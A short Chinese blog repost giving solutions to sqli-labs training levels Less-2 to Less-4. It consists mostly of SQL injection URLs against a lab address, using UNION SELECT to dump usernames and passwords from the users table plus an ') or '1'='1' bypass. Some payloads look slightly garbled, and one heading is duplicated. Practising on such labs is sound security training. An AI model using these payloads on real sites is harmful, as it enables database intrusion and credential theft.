码迷,mamicode.com
首页 > 数据库 > 详细

sqllab less 2- less 4

时间:2020-01-06 21:20:23      阅读:109      评论:0      收藏:0      [点我收藏+]

标签:name   har   less   sql 语句   code   nbsp   union   nio   user   

less 2 跟less 1区别: 去掉单引号查询表的用户名与密码

 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,‘:‘,password) from security.users --+  

 less 3 跟less 1 区别: 加上)将SQL 语句闭合

http://10.9.2.81/Less-3/?id=1 ‘)or ‘1‘=‘1‘ --+

  less 3 跟less 1 区别: 加上)将SQL 语句闭合

http://10.9.2.81/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users%20--+

less 4 跟less 3 区别 ‘ 变成 ”


http://10.9.2.81/Less-3/?id=-1’union select2,3,group_concat(username,:,password) from security.users--+

sqllab less 2- less 4

标签:name   har   less   sql 语句   code   nbsp   union   nio   user   

原文地址:https://www.cnblogs.com/vennus/p/12122925.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!